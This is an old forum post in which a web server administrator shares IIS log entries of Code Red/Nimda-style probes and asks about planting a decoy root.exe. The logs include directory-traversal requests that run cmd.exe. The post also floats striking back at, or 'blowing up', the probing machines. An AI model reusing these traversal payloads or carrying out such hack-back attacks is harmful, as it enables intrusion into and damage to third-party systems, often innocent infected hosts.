Hi,
Every morning my server logs are filled with dozens of the following:
2002-04-17 00:08:52 217.83.72.182 - 10.72.64.27 80 GET /scripts/..%5c%5c../winnt/system32/cmd.exe /c+dir 401 -
2002-04-17 00:45:23 12.99.208.230 - 10.72.64.27 80 GET /scripts/root.exe /c+dir 401 -
2002-04-17 00:45:27 12.99.208.230 - 10.72.64.27 80 GET /MSADC/root.exe /c+dir 403 -
2002-04-17 00:45:27 12.99.208.230 - 10.72.64.27 80 GET /c/winnt/system32/cmd.exe /c+dir 401 -
2002-04-17 01:50:10 12.239.52.5 - 10.72.64.27 80 GET /scripts/root.exe /c+dir 401 -
2002-04-17 01:50:14 12.239.52.5 - 10.72.64.27 80 GET /MSADC/root.exe /c+dir 403 -
2002-04-17 01:50:14 12.239.52.5 - 10.72.64.27 80 GET /c/winnt/system32/cmd.exe /c+dir 401 -
2002-04-17 01:50:16 12.239.52.5 - 10.72.64.27 80 GET /d/winnt/system32/cmd.exe /c+dir 401 -
2002-04-17 01:50:16 12.239.52.5 - 10.72.64.27 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2002-04-17 01:50:17 12.239.52.5 - 10.72.64.27 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 -
I recognize this as attempts to gain control of my system for some nefarious purpose. I believe the viruses Code-Red and Nimda use this method to infect systems.
One of the things it looks for is a root.exe in the /scripts or /MSADC folders, neither of which exists on my system.

Question:
I was wondering if it would be possible to create a program named root.exe that would:

1. Send a message to the offending IP telling them to dis-infect their system.
or
2. Stopping their web server.
or
3. Blowing up their system.

Any thoughts or comments?

Thanks,
Al.